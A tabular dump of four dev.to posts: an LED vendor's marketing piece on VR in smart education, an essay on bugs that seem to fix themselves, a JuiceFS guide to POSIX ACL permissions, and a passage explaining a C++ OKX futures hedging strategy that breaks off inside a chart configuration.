| id (int64) | title (string) | description (string) | collection_id (int64) | published_timestamp (timestamp[s]) | canonical_url (string) | tag_list (string) | body_markdown (string) | user_username (string) |
|---|---|---|---|---|---|---|---|---|
1,879,867 | LED companies use VR technology to enter the smart education market | New opportunities for LED companies With the rapid development of smart education, LED companies... | 0 | 2024-06-07T03:34:33 | https://dev.to/sostrondylan/led-companies-use-vr-technology-to-layout-the-smart-education-market-3hha | led, vr, technology | 1. New opportunities for LED companies
With the rapid development of smart education, LED companies have seen new market opportunities. Demand for innovative technologies in the education market is growing, especially for improving the interactivity and practicality of teaching. By combining VR technology, LED companies can provide a more immersive and interactive teaching experience for the education field, which not only attracts students' attention but also improves teaching efficiency. [Understand the working principle of LED interactive floor tile screens in 8 minutes.](https://sostron.com/8-minutes-to-understand-the-working-principle-of-led-interactive-tile-screen/)

2. Application of VR technology in education
VR technology has broad application prospects in education. In a virtual reality environment, students can conduct simulation experiments, reproduce historical scenes, analyze spatial structures, and do other things that are difficult to achieve in traditional teaching. LED companies can enhance the presentation of VR teaching content by providing high-quality display solutions, making teaching more vivid and intuitive. [10 major differences between XR technology and virtual production technology.](https://sostron.com/10-differences-between-xr-technology-and-virtual-production-technology/)

3. Combination of LED and VR technology
The combination of LED displays and VR technology has brought new vitality to the education market. The high resolution, high brightness, and wide color gamut of small-pitch LED displays provide a more delicate and realistic visual experience for VR content. In addition, the seamless splicing capability of LED displays makes large-screen presentation possible, which is especially important for VR applications that need to display complex scenes or data.

4. Technical challenges and solutions
Although the combination of LED and VR technology has brought new opportunities to the education market, it also faces technical challenges: how to reduce the cost of VR equipment, how to improve the interactivity and educational value of content, and how to ensure comfort during long-term use. LED companies need to work closely with education experts, technology developers, and content creators to explore solutions together. [See the price range of commercial LED displays.](https://sostron.com/commercial-led-display-price-range/)

5. Marketing and cooperation
LED companies need to consider marketing and cooperation strategies when entering the smart education market. By establishing partnerships with educational institutions, educational technology companies, and government departments, they can better understand market demand and develop products and solutions suited to educational scenarios. At the same time, by participating in educational exhibitions and holding seminars, they can increase brand awareness and expand market influence. [Why do brands prefer LED display advertising?](https://sostron.com/why-do-brands-like-to-put-led-display-ads-most/)

6. Continuous innovation and R&D
Continuous technological innovation is the key to the success of LED companies in the smart education market. LED companies need to keep investing in R&D to improve the technical performance of their products and meet the education market's needs for high definition and high interactivity. At the same time, they need to pay attention to emerging technologies such as 5G and artificial intelligence and explore the possibility of combining them with LED displays.
7. Conclusion
LED companies using VR technology to enter the smart education market is a bold attempt and innovation. By providing high-quality display solutions combined with VR technology, LED companies are expected to open up new market space in the field of smart education. With the continuous advancement of technology and the gradual maturing of the market, we expect LED companies to achieve more in the field of smart education and make greater contributions to the development of education.
Thank you for reading. I hope this helps solve your problems. Sostron is a professional [LED display manufacturer](https://sostron.com/about). We provide all kinds of displays, display leasing, and display solutions around the world. To learn more, read: [Special-shaped screens become a new trend in LED display screens.](https://dev.to/sostrondylan/special-shaped-screens-become-a-new-trend-in-led-display-screens-511b)
Follow me to learn more about LED displays.
Contact us on WhatsApp:https://api.whatsapp.com/send?phone=+8613570218702&text=Hello | sostrondylan |
1,879,866 | The Curious Case of Bugs that Fix Themselves | I can’t count how many times I had this conversation: “Good news! The bug is fixed!” “Did you fix... | 25,505 | 2024-06-07T03:34:31 | https://www.growingdev.net/p/the-curious-case-of-bugs-that-fix | programming, beginners, softwaredevelopment, softwareengineering | I can’t count how many times I had this conversation:
  “Good news! The bug is fixed!”
  “Did you fix it?”
  “No.”
  “Did anyone else fix it?”
  “No.”
  “How is it fixed then?”
  “I don’t know. I could reproduce it last week, but I cannot reproduce it anymore, so it’s fixed.”
  “Hmmm, can you dig a bit more to understand why it no longer reproduces?”
  [Two hours later]
  “I have a fix. Can you review my PR?”
## Can bugs fix themselves?
I grow extremely skeptical whenever a fellow software developer tries to convince me that an issue they were assigned to fix magically fixed itself. Software defects are a result of incorrect program logic. This logic has to change for the defect to be fixed.
Can bugs disappear? Yes, they can and do disappear. But this doesn’t mean that they are fixed. Unless the root cause has been identified and addressed, the issue exists and will pop up again.
## The most common reasons bugs disappear

Seeing an issue disappear might feel like a stroke of luck - no bug, no problem. But if the bug was not fixed, it is there - always lurking, ready to strike. Here are the most common reasons a bug may disappear:
### Environment changes
A change in the environment no longer triggers the condition responsible for the bug. For instance, a bug that could be easily reproduced on February 29th is not reproducible on March 1st.
### Configuration changes
The code path responsible for the bug may no longer be exercised after reconfiguring the application.
### Data changes
Many bugs only manifest for specific data. If this data is removed, the bug disappears until the next time the same data shows up.
### Unrelated code changes
Someone modified the code, changing the condition that triggers the bug.
### Concurrency (threading) bugs
Concurrency bugs are among the hardest to crack because they can't be reproduced consistently. Troubleshooting is difficult: even small modifications to the program (e.g., adding additional logging) can make reproducing the issue much harder, which is why concurrency bugs are a great example of [Heisenbugs](https://en.m.wikipedia.org/wiki/Heisenbug). And the worst part: when the fix lands, there is always the uncertainty of whether it worked, because the bug could never be reproduced consistently to begin with.
### The bug was indeed fixed
A developer touching the code fixed the bug. This fix doesn’t have to be intentional - sometimes, refactoring or implementing a feature may result in deleting or fixing the buggy code path.
### The bug didn’t disappear.
The developer tasked with fixing the bug missed something or didn’t understand the bug in the first place. We’ve all been there. Dismissing a popup without reading what it says or ignoring an error message indicating a problem happens to everyone.
Fixing a bug can be easier than figuring out why it stopped manifesting. But understanding why a bug suddenly disappeared is important. It allows for re-assessing its severity and priority under new circumstances.
## Conclusion
If nobody fixed it, it ain’t fixed.
---
💙 If you liked this article...
I publish a weekly newsletter for software engineers who want to grow their careers. I share mistakes I’ve made and lessons I’ve learned over the past 20 years as a software engineer.
Sign up here to get articles like this delivered to your inbox:
https://www.growingdev.net/ | moozzyk |
1,879,865 | Managing POSIX ACL Permissions in JuiceFS | Access Control Lists (ACLs) are a mechanism for implementing finer-grained permissions control in... | 0 | 2024-06-07T03:31:02 | https://dev.to/daswu/managing-posix-acl-permissions-in-juicefs-5hbe | Access Control Lists (ACLs) are a mechanism for implementing finer-grained permissions control in Unix-like systems, such as Linux, macOS, and FreeBSD. They extend the traditional Unix permissions model and provide a more flexible and detailed way to manage permissions.
In the traditional Unix permissions model, the permissions for a file or directory are categorized into three types:
- Owner permissions
- Group permissions
- Others permissions
This model is simple and easy to understand but can be limiting in scenarios that require more granular control. For example, if you want to allow a specific user to access a file without making them a part of the file's group, the traditional Unix permissions model falls short.
This is where POSIX ACLs come into play. With POSIX ACLs, you can assign individual permissions to each user or group, rather than just the file's owner, group, or others.
This article is a guide to managing POSIX ACLs in JuiceFS for fine-grained file permissions. It covers enabling ACLs, setting and checking permissions, and preserving ACLs during file operations.
## Requirements for using ACLs in JuiceFS
[JuiceFS Enterprise Edition](https://juicefs.com/docs/cloud/) always supports ACLs, while [JuiceFS Community Edition](https://juicefs.com/docs/community/introduction/) supports POSIX ACLs starting from version 1.2. This guide focuses on the community edition.
Before enabling ACLs in JuiceFS Community Edition, keep the following points in mind:
- ACLs are associated with the file system and cannot be disabled once enabled.
- To enable ACLs on a file system, you need to upgrade all clients to version 1.2 or later to avoid interference with permission settings by older clients.
## Prepare the file system
### Confirm the client version
Check the client version.
```bash
$ juicefs version
juicefs version 1.2.0-beta1+2024-04-18.041e931
```
As of the publication of this article, the latest client version is JuiceFS v1.2.0-beta2. You can find the precompiled version for your CPU architecture on [GitHub Releases](https://github.com/juicedata/juicefs/releases) or follow our document to [compile the client manually](https://juicefs.com/docs/community/getting-started/installation/#manually-compiling).
The ACL feature has no requirements on the metadata engine and can be used on any JuiceFS file system, whether created with the new client or an older one. As long as you use the new client version, you can enable ACLs in an existing file system.
### Create your file system
If you don’t have a file system, refer to the [document](https://juicefs.com/docs/community/getting-started/standalone/) to create your file system.
### Enable ACLs for a new file system
To enable ACLs when creating a file system, use the version 1.2 or later client with the `--enable-acl` option:
```bash
juicefs format --enable-acl \
    --bucket xxx \
    --access-key xxx \
    --secret-key xxx \
    ...
    redis://xxx.myserver.com/1 myjfs
```
### Enable ACLs for an existing file system
Use the client of version 1.2 or later to enable ACLs for the existing file system with the `config` command:
```bash
juicefs config --enable-acl redis://xxx.myserver.com/1
```
### Check if a file system has ACLs enabled
You need to use the client of version 1.2 or later to check if a file system has ACLs enabled, as older clients cannot output ACL-related information. For example:
```bash
$ juicefs status redis://192.168.1.80/1
{
"Setting": {
"Name": "myjfs",
"UUID": "fdc09170-3e1b-43be-bc64-c30e6031a7b9",
"Storage": "minio",
"Bucket": "http://192.168.1.80:9123/myjfs",
"AccessKey": "herald",
"SecretKey": "removed",
"BlockSize": 4096,
"Compression": "none",
"EncryptAlgo": "aes256gcm-rsa",
"KeyEncrypted": true,
"TrashDays": 1,
"MetaVersion": 1,
"MinClientVersion": "1.1.0-A",
"DirStats": true,
"EnableACL": false
},
...
```
After enabling ACLs for a file system, the minimum client version recorded in the status information will also change. For example:
```bash
{
"Setting": {
"Name": "myjfs",
"UUID": "fdc09170-3e1b-43be-bc64-c30e6031a7b9",
"Storage": "minio",
"Bucket": "http://192.168.1.80:9123/myjfs",
"AccessKey": "herald",
"SecretKey": "removed",
"BlockSize": 4096,
"Compression": "none",
"EncryptAlgo": "aes256gcm-rsa",
"KeyEncrypted": true,
"TrashDays": 1,
"MetaVersion": 1,
"MinClientVersion": "1.2.0-A",
"DirStats": true,
"EnableACL": true
},
```
## Tools for managing ACLs
In Linux, the primary tools for managing and configuring ACLs are:
- `getfacl`: gets the ACL information of a file or directory.
- `setfacl`: sets the ACL of a file or directory.
Some Linux distributions do not install these tools by default. To install them:
- For Debian and Ubuntu systems, you can run the `sudo apt-get install acl` command.
- For Red Hat, AlmaLinux, and Rocky Linux, you can use the `sudo dnf install acl` command.
## Use ACLs to manage file permissions in JuiceFS
### POSIX file permissions
In Linux systems, permissions for files or directories are managed by users or groups.
For example, when you use the `ls -l` command to list the information of files in a directory, the first field of each record is a 10-character string like `-rw-r--r--`. This represents the permissions of the user, group, and others for that file:
- The 1st character represents the file type:
- `-` for a regular file
- `d` for a directory
- `l` for a symbolic link
- `s` for a socket
- The 2nd to 4th characters represent the owner's permissions:
- `r` for reads
- `w` for writes
- `x` for execution
- If a permission is not granted, it’s represented by `-`
- The 5th to 7th characters represent the group's permissions:
- `r` for reads
- `w` for writes
- `x` for execution
- If a permission is not granted, it’s represented by `-`
- The 8th to 10th characters represent the permissions for others:
- `r` for reads
- `w` for writes
- `x` for execution
- If a permission is not granted, it’s represented by `-`
For example, `-rw-r--r--` indicates:
- This is a regular file.
- The owner has read and write permissions.
- The group and others have read-only permissions.

In the permissions information shown above, the owner is `herald` and the group is `admin`. If you want to grant read and write permissions for the file README.md to a user named `tom`, there are a few options:
- Make `tom` the owner of the file. But this would take ownership away from `herald`.
- Add `tom` to the `admin` group and grant write permissions to the entire group. But this would break the read-only restriction for the `admin` group, giving all members read and write access.
- Assign read and write permissions to others. But this would widen the permissions far too much.
Clearly, the standard Linux permission model cannot implement fine-grained file permission control, while ACLs can easily fulfill this requirement.
### Use ACLs to assign permissions
To set ACL permissions for files and directories, you can use the tools `getfacl` and `setfacl`:
- `getfacl` lists the ACL information.
- `setfacl` sets ACL permissions.
#### Set ACL permissions for files
Using the README.md file as an example, first, check its ACL settings:

The output shows the file's ACL information:
- The first three lines are the file name, owner, and group.
- The next three lines show the current permissions settings, which match those listed by the `ls -l` command. This means that without ACL settings, the displayed information is the default POSIX permissions.
Now, use `setfacl` to grant read and write permissions to a user named `tom`, who is not in the admin group. The syntax for setting ACL permissions for a user is `setfacl -m u:username:permissions filename_or_directoryname`.

As shown in the figure:
1. The `id` command confirms that the user is not in the `admin` user group.
2. `setfacl` grants the user `rw` read-write permissions.
3. After setting the permissions, `getfacl` lists the file's ACL settings.
After setting, the output shows two new lines:
- `user:tom:rw-`: The newly added ACL entry, indicating that user `tom` has read and write permissions for the file.
- `mask::rw-`: It is the permission mask automatically added by the ACL to the file. It sets the maximum effective permissions for ACL entries in the group class.
Now, user `tom` has edit permissions for the README.md file and can verify this by using `sudo -u tom nano README.md` to modify and save the file.
In my system, there is a user named `jerry` in the `admin` group. As the figure below shows, when attempting to edit the file as `jerry`, the editor shows that the user does not have write permission:

This indicates that the ACL settings did not affect the default file permissions.
Similarly, you can assign read and write permissions to a specific user group using the syntax `setfacl -m g:user-group:permissions filename_or_directoryname`.

As shown in the image, the `www-data` user group was granted read and write permissions for the README.md file. This means that all users in this group now have read and write access to the file. However, the default POSIX permissions for the `admin` user group remain read-only. This allows for flexible permission definitions for any number of users or groups based on specific needs.
#### Set ACL permissions for a directory
Setting ACL permissions for a directory is similar to setting them for a file. Use `getfacl` to retrieve the ACL information for the directory, and `setfacl` to set the ACL permissions.
As the figure below shows, I extracted files at the JuiceFS mount point and created a new directory. By using `getfacl`, I retrieved the ACL information for this directory and used `setfacl` to grant user `tom` read, write, and execute (rwx) permissions for the directory.

From the figure, you can see that directories include execute (x) permissions by default; without them, you cannot enter the directory. Following this logic, you can set ACL permissions based on directory access, such as restricting the `www-data` group from entering the directory by granting it `rw-` (no execute bit) with `sudo setfacl -m g:www-data:rw- directory`.

Similarly, you can assign access permissions for any user or group to a directory. To apply the ACL rules to all files and subdirectories, use the `-R` option. For example, `setfacl -R -m u:tom:rwx your-directory`.
#### Set default ACL permissions for a directory
You might notice that setting ACL permissions on a directory only affects the directory itself. For example, granting `tom` rwx permissions to the directory does not provide write access to the files within. This is because ACL settings do not propagate by default.
To propagate ACL permissions to newly created files in a directory, use default permissions by adding the `-d` option when setting them.

After setting default permissions, the directory's ACL information will include default definitions. Any new files added to this directory will automatically inherit these default ACL permissions. In the example above, `tom` will have full read, write, and execute permissions for any new files or directories created within.
Note that the default ACL permissions do not affect existing files in the directory. To apply the ACL rules to existing files, use the `-R` option. For example, `setfacl -R -m u:tom:rwx your-directory`.
#### Remove ACL permissions
To remove ACL rules defined on a file or directory, use the `-x` option, as shown in the figure below:

In addition, to recursively remove all ACL settings from all files in a directory, use `setfacl -R -b your-directory`.
## Note
**Preserving ACL permissions during copying**
Tools like `cp` and `rsync` do not preserve ACL settings by default. To retain ACL permissions during file or directory operations, ensure you understand the relevant options for these tools. For example:
```bash
# cp uses -a or --archive
cp -a source_file destination
# rsync uses -A or --acls (-X/--xattrs covers extended attributes, not ACLs)
rsync -avA source_file destination
```
## Conclusion
This article introduced the basic usage of POSIX ACL from the perspective of the JuiceFS file system, highlighting the differences from default POSIX permissions and considerations in daily use. It provides detailed examples of using `getfacl` and `setfacl` commands for setting file, directory, and default ACL permissions.
I hope this information is helpful to JuiceFS users. If you have any feedback or suggestions, you can join JuiceFS [discussions on GitHub](https://github.com/juicedata/juicefs/discussions) and [our community on Slack](https://juicefs.slack.com/ssb/redirect). | daswu | |
1,879,863 | "C++ version of OKX futures contract hedging strategy" that takes you through hardcore quantitative strategy | Speaking of hedging strategies, there are various types, diverse combinations, and diverse ideas in... | 0 | 2024-06-07T03:23:18 | https://dev.to/fmzquant/c-version-of-okx-futures-contract-hedging-strategy-that-takes-you-through-hardcore-quantitative-strategy-1p9 | strategy, trading, hedging, contract | Speaking of hedging strategies, there are many types, diverse combinations, and diverse ideas across various markets. We will explore the design ideas and concepts of hedging strategies through the most classic form: intertemporal hedging. Today, the cryptocurrency market is much more active than in its early days, and many futures contract exchanges offer plenty of opportunities for arbitrage hedging. Spot cross-market arbitrage, spot-futures arbitrage, futures intertemporal arbitrage, futures cross-market arbitrage, and other crypto quantitative trading strategies emerge one after another. Let's take a look at a "hardcore" intertemporal hedging strategy written in C++ and trading on the OKX exchange, built on the FMZ Quant quantitative trading platform.
## Principle of strategy
Why is the strategy somewhat hardcore? Because it is written in C++, the strategy code is slightly harder to read. But that does not prevent readers from learning the essence of this strategy's design and ideas. The strategy logic is relatively simple and the code length is moderate, only about 500 lines. In terms of market data acquisition, unlike other strategies that use the REST interface, this strategy uses the WebSocket interface to receive the exchange's market quotes.
In terms of design, the strategy structure is reasonable, the code coupling is very low, and it is easy to extend or optimize. The logic is clear, and such a design is not only easy to understand; studying it also makes a good teaching example. The principle of the strategy is relatively simple: whether the spread between the forward contract and the recent contract is positive or negative. The basic principle is consistent with the intertemporal hedging of commodity futures.
- Spread positive: sell short the forward contract, buy long the recent contract.
- Spread negative: buy long the forward contract, sell short the recent contract.
After understanding the basic principles, the rest is strategy detail processing: how the strategy triggers the opening of a hedge position, how to close the position, how to add positions, how to control the total position, and so on.
The hedging strategy is mainly concerned with the fluctuation of the spread and its regression. However, the spread may fluctuate slightly, oscillate sharply, or run in one direction.
This brings uncertainty about hedging profits and losses, but the risk is still much smaller than that of a unilateral trend. For optimizations of the intertemporal strategy, we can start from the position control level and from the opening and closing trigger conditions. For example, we can use the classic Bollinger Bands indicator to judge the spread's fluctuation. Thanks to the reasonable design and low coupling, this strategy can easily be modified into a "Bollinger Bands intertemporal hedging strategy".
## Analysis of strategy code
Looking through the code as a whole, you can see that it is roughly divided into four parts.
1. Enumeration value definitions and utility functions: some state values are defined for marking states, plus utility functions unrelated to the strategy logic, such as a URL-encoding function and a time-conversion function, which exist only for data processing.
2. K-line data generator class: The strategy is driven by the K-line data generated by the generator class object.
3. Hedging class: Objects of this class can perform specific trading logic, hedging operations, and processing details of the strategy.
4. The main function of the strategy, the "main" function, is the entry point of the strategy. The main loop is executed inside this function. In addition, this function performs an important operation: accessing the exchange's WebSocket interface and passing the pushed raw tick market data to the K-line data generator.
**Through the overall understanding of the strategy code, we can gradually learn the various aspects of the strategy, and then study the design, ideas and skills of the strategy.**
- Enumeration value definitions and other utility functions
1. Enumerated type State declaration
```
enum State { // Enum type defines some states
STATE_NA, // Abnormal state
STATE_IDLE, // idle
STATE_HOLD_LONG, // holding long positions
STATE_HOLD_SHORT, // holding short positions
};
```
Because some functions in the code return a state, these states are defined in the enumeration type State.
STATE_NA appearing in the code indicates an abnormal state, and STATE_IDLE means idle, that is, a state in which a hedging operation can be performed. STATE_HOLD_LONG is the state of holding a positive hedge position, and STATE_HOLD_SHORT is the state of holding a negative hedge position.
2. A string replacement function; it is not called in this strategy and serves as a spare utility function for handling strings.
```
string replace(string s, const string from, const string& to)
```
3. A function toHex for converting a value to a hexadecimal character
```
inline unsigned char toHex(unsigned char x)
```
4. A function for handling URL encoding
```
std::string urlencode(const std::string& str)
```
5. A time conversion function that converts the time in string format to a timestamp.
```
uint64_t _Time(string &s)
```
- K line data generator class
```
class BarFeeder { // K line data generator class
public:
BarFeeder(int period) : _period(period) { // constructor with argument "period" period, initialized in initialization list
_rs.Valid = true; // Initialize the "Valid" property of the K-line data in the constructor body.
}
void feed(double price, chart *c=nullptr, int chartIdx=0) { // input data, "nullptr" null pointer type, "chartIdx" index default parameter is 0
uint64_t epoch = uint64_t(Unix() / _period) * _period * 1000; // The second-level timestamp removes the incomplete time period (incomplete _period seconds) and is converted to a millisecond timestamp.
bool newBar = false; // mark the tag variable of the new K line Bar
if (_rs.size() == 0 || _rs[_rs.size()-1].Time < epoch) { // if the K line data is 0 in length. Or the last bar's timestamp is less than epoch (the last bar of the K line is more than the current most recent cycle timestamp)
record r; // declare a K line bar structure
r.Time = epoch; // construct the K line bar of the current cycle
r.Open = r.High = r.Low = r.close = price; // Initialize the property
_rs.push_back(r); // K line bar is pressed into the K line data structure
if (_rs.size() > 2000) { // if the K-line data structure length exceeds 2000, the oldest data is removed.
_rs.erase(_rs.begin());
}
newBar = true; // tag
} else { // In other cases, it is not the case of a new bar.
record &r = _rs[_rs.size() - 1]; // Reference the data of the last bar in the data.
r.High = max(r.High, price); // The highest price update operation for the referenced data.
r.Low = min(r.Low, price); // The lowest price update operation for the referenced data.
r.close = price; // Update the closing price of the referenced data.
}
auto bar = _rs[_rs.size()-1]; // Take the last column data and assign it to the bar variable
json point = {bar.Time, bar.Open, bar.High, bar.Low, bar.close}; // construct a json type data
if (c != nullptr) { // The chart object pointer is not equal to the null pointer, do the following.
if (newBar) { // judge if the new Bar appears
c->add(chartIdx, point); // call the chart object member function add to insert data into the chart object (new k line bar)
c->reset(1000); // retain only 1000 bar of data
} else {
c->add(chartIdx, point, -1); // Otherwise update (not new bar), this point (update this bar).
}
}
}
records & get() { // member function, method for getting K line data.
        return _rs; // Returns the object's private variable _rs (i.e., the generated K-line data)
}
private:
int _period;
records _rs;
};
```
This class is mainly responsible for processing the acquired tick data into spread K-line data, which drives the strategy's hedging logic.
Some readers may ask: why use tick data? Why construct a K-line data generator like this? Wouldn't it be easier to use K-line data directly? This question comes up again and again. When I wrote some hedging strategies, I was puzzled by it too, and I found the answer when writing the "Bollinger hedging strategy". The K-line data of a single contract is the statistics of that contract's price changes over a certain period.
The K-line data of the difference between two contracts is the statistics of the spread's changes over a certain period. Therefore, you cannot simply subtract the two contracts' K-line data bar by bar to compute the spread on each K-line bar. The most obvious error: for example, the highest and lowest prices of the two contracts do not necessarily occur at the same time, so the subtracted values don't mean much.
Therefore, we need to use real-time tick data to calculate the spread in real time, and to calculate its price changes over each period in real time (that is, the highest, lowest, open, and close prices of each K-line bar). So we need a K-line data generator, implemented as a class to keep the processing logic well separated.
- Hedging class
```
class Hedge { // Hedging class, the main logic of the strategy.
public:
Hedge() { // constructor
...
};
State getState(string &symbolA, depth &depthA, string &symbolB, depth &depthB) { // Get state, parameters: contract A name, contract A depth data, contract B name, contract B depth data
...
}
bool Loop(string &symbolA, depth &depthA, string &symbolB, depth &depthB, string extra="") { // Opening and closing position main logic
...
}
private:
vector<double> _addArr; // Hedging adding position list
string _state_desc[4] = {"NA", "IDLE", "LONG", "SHORT"}; // Status value Description
int _countOpen = 0; // number of opening positions
int _countcover = 0; // number of closing positions
int _lastcache = 0; //
int _hedgecount = 0; // number of hedging
int _loopcount = 0; // loop count (cycle count)
double _holdPrice = 0; // holding position price
BarFeeder _feederA = BarFeeder(DPeriod); // A contract Quote K line generator
BarFeeder _feederB = BarFeeder(DPeriod); // B contract Quote K line generator
State _st = STATE_NA; // Hedging type Object Hedging position status
string _cfgStr; // chart configuration string
double _holdAmount = 0; // holding position amount
bool _iscover = false; // the tag of whether to close the position
bool _needcheckOrder = true; // Set whether to check the order
chart _c = chart(""); // chart object and initialize
};
```
Because the code is relatively long, some parts are omitted; this mainly shows the structure of the Hedge class. The constructor is omitted, since it mainly performs object initialization. Next, we introduce the two main member functions.
**getState**
This function mainly handles order inspection, order cancellation, position detection, position balancing and so on. In hedging transactions it is impossible to completely avoid a "single leg" (one contract's order is executed while the other's is not). If this check were performed inside the order-placing logic, followed by re-sending orders or closing positions there, the strategy logic would become chaotic.
So when designing this part I took a different approach: once a hedging operation is triggered and the orders have been placed, the hedge is assumed to be successful regardless of whether a single leg occurred. The position balance is then detected in the getState function, and the balancing logic is handled there independently.
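That balancing idea can be sketched as a pure function (Python; `check_balance`, the signed-amount convention, and the returned actions are invented for illustration and are not the strategy's actual code):

```python
# Sketch: single-leg detection after a hedge order pair.
# Holdings are signed contract amounts: positive = long, negative = short.

def check_balance(hold_a, hold_b):
    """Compare the two legs and return the corrective action, if any.

    A proper hedge holds equal and opposite exposure, e.g. short A / long B,
    so the signed sum of the two legs should be zero. If one leg was filled
    and the other was not (a "single leg"), the residual tells us which leg
    to top up or trim, and by how much.
    """
    imbalance = hold_a + hold_b          # 0 means perfectly hedged
    if imbalance == 0:
        return ("balanced", 0)
    if abs(hold_a) < abs(hold_b):        # leg A under-filled: adjust leg A
        return ("fix_leg_a", -imbalance)
    return ("fix_leg_b", -imbalance)     # otherwise adjust leg B

# Short 10 of A, but only 7 of the intended long 10 on B were filled:
print(check_balance(-10, 7))   # leg B still needs 3 more contracts
```

Running the check once per getState call, rather than inside the order-placing path, is what keeps the main trading logic free of retry branches.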
**Loop**
The trading logic of the strategy is encapsulated in this function. It calls getState, uses the K-line data generator objects to produce the K-line data of the difference (the spread), and performs the judgment of the opening, closing and position-adding logic. It also performs some data update operations for the chart.
- Strategy main function
```
void main() {
...
    string realSymbolA = exchange.SetContractType(symbolA)["instrument"]; // Get the real contract ID corresponding to contract A (this_week / next_week / quarter on OKEX futures)
    string realSymbolB = exchange.SetContractType(symbolB)["instrument"]; // Same for contract B
    string qs = urlencode(json({{"op", "subscribe"}, {"args", {"futures/depth5:" + realSymbolA, "futures/depth5:" + realSymbolB}}}).dump()); // JSON-encode, then URL-encode the parameters to be passed to the ws interface
    Log("try connect to websocket"); // Print a message before connecting to the WS interface
    auto ws = Dial("wss://real.okex.com:10442/ws/v3|compress=gzip_raw&mode=recv&reconnect=true&payload="+qs); // call the FMZ API "Dial" function to access the WS interface of OKEX Futures
    Log("connect to websocket success");
depth depthA, depthB; // Declare two variables of the depth data structure to store the depth data of the A contract and the B contract
    auto filldepth = [](json &data, depth &d) { // lambda that fills a depth struct from the JSON data returned by the interface
d.Valid = true;
d.Asks.clear();
d.Asks.push_back({atof(string(data["asks"][0][0]).c_str()), atof(string(data["asks"][0][1]).c_str( ))});
d.Bids.clear();
d.Bids.push_back({atof(string(data["bids"][0][0]).c_str()), atof(string(data["bids"][0][1]).c_str( ))});
};
string timeA; // time string A
string timeB; // time string B
while (true) {
auto buf = ws.read(); // Read the data pushed by the WS interface
...
}
```
After the strategy is started, execution begins from the main function. During initialization, the main function subscribes to the tick market of the websocket interface. Its main job is then to run a main loop that continuously receives the tick quotes pushed by the exchange's websocket interface and calls the Loop member function of the Hedge class object, so that the trading logic in Loop is driven by the market data.
One point to note: the "tick market" mentioned above is actually a subscription to the order book depth data interface, which pushes the book level by level. The strategy only uses the first level, which is almost equivalent to tick market data; it uses neither the other levels nor the order volume of the first level.
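For illustration, the same first-level extraction that the `filldepth` lambda performs can be sketched in Python (the sample payload is made up, but follows the asks/bids price-and-size-as-strings layout used above):

```python
import json

# Hypothetical depth payload fragment, shaped like the data the
# filldepth lambda consumes: each level is a [price, size] string pair.
msg = json.loads('{"asks": [["8750.2", "12"], ["8750.5", "3"]],'
                 ' "bids": [["8749.8", "7"], ["8749.1", "20"]]}')

def best_levels(data):
    """Keep only the first level of the book, as the strategy does."""
    ask_price, ask_size = (float(x) for x in data["asks"][0][:2])
    bid_price, bid_size = (float(x) for x in data["bids"][0][:2])
    return {"ask": (ask_price, ask_size), "bid": (bid_price, bid_size)}

top = best_levels(msg)
mid = (top["ask"][0] + top["bid"][0]) / 2   # a tick-like mid price
print(top, mid)
```

Only the two best prices matter here; the sizes and deeper levels are parsed but ignored by the spread calculation, mirroring the text above.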
Take a closer look at how the strategy subscribes to the data of the websocket interface and how it is set up.
```
string qs = urlencode(json({{"op", "subscribe"}, {"args", {"futures/depth5:" + realSymbolA, "futures/depth5:" + realSymbolB}}}).dump());
Log("try connect to websocket");
auto ws = Dial("wss://real.okex.com:10442/ws/v3|compress=gzip_raw&mode=recv&reconnect=true&payload="+qs);
Log("connect to websocket success");
```
First, the JSON subscription message passed to the interface is URL-encoded; this becomes the value of the payload parameter. The next important step is to call the FMZ Quant platform's API function Dial, which can be used to access an exchange's websocket interface. Here we add some settings so that the websocket control object ws to be created reconnects automatically after a disconnection (the subscription message is again the qs string given as the payload parameter). To enable this, configuration items are appended to the Dial function's parameter string.
The beginning of the Dial function parameter is as follows:
```
wss://real.okex.com:10442/ws/v3
```
This is the address of the websocket interface to be accessed; it is separated from the configuration by "|". Everything after it, `compress=gzip_raw&mode=recv&reconnect=true&payload="+qs`, consists of configuration parameters.

With this setting, even if the websocket connection is disconnected, the underlying system of the FMZ Quant docker will automatically reconnect and fetch the latest market data in time, so the strategy catches every price fluctuation and quickly captures the right hedging opportunities.
- Position control
Position control uses a ratio of hedge positions similar to the Fibonacci sequence.
```
for (int i = 0; i < AddMax + 1; i++) { // build the data structure that controls the size of each added position; the ratios grow like a Fibonacci sequence
    if (_addArr.size() < 2) {          // the first two entries seed the sequence: 1x and 2x the opening amount
        _addArr.push_back((i + 1) * OpenAmount);
    } else {                           // each later entry is the sum of the previous two, stored into "_addArr"
        _addArr.push_back(_addArr[_addArr.size() - 1] + _addArr[_addArr.size() - 2]);
    }
}
```
As you can see, each added position is the sum of the previous two. This position control adds relatively more to the arbitrage hedge as the spread grows, while keeping the position dispersed: small positions capture small price fluctuations, and the position is increased appropriately for large fluctuations.
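The intended ladder can be reproduced in Python (assuming, as the comments describe, that the first two entries seed the sequence at 1x and 2x the opening amount and that each later entry is the sum of the previous two; `build_add_ladder` is a name invented here):

```python
def build_add_ladder(open_amount, add_max):
    """Position size for each add, growing like a Fibonacci sequence."""
    arr = []
    for i in range(add_max + 1):
        if len(arr) < 2:
            arr.append((i + 1) * open_amount)  # seed: 1x, then 2x
        else:
            arr.append(arr[-1] + arr[-2])      # each add = sum of last two
    return arr

# With an opening amount of 1 contract and 5 allowed adds:
print(build_add_ladder(1, 5))   # [1, 2, 3, 5, 8, 13]
```

If every add triggers with OpenAmount=1 and AddMax=5, total exposure is 1+2+3+5+8+13 = 32 contracts, heavily weighted toward the larger spreads.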
- Closing position: stop loss and take profit
The stop-loss spread and take-profit spread are fixed. When the spread of the held position reaches the take-profit or stop-loss level, the position is closed accordingly.
- The design of entering and leaving the market
The period controlled by the NPeriod parameter provides some dynamic control over the strategy's opening and closing levels.
- Strategy chart
The strategy automatically generates a spread K-line chart to mark relevant transaction information.
Drawing a custom chart in a C++ strategy is also very simple. In the constructor of the Hedge class, the prepared chart configuration string _cfgStr is used to configure the chart object _c, a private member of the Hedge class, which is initialized with the chart object constructed by the FMZ Quant platform's custom chart API.
```
_cfgStr = R"EOF(
[{
"extension": { "layout": "single", "col": 6, "height": "500px"},
"rangeSelector": {"enabled": false},
"tooltip": {"xDateformat": "%Y-%m-%d %H:%M:%S, %A"},
"plotOptions": {"candlestick": {"color": "#d75442", "upcolor": "#6ba583"}},
"chart":{"type":"line"},
"title":{"text":"Spread Long"},
"xAxis":{"title":{"text":"Date"}},
"series":[
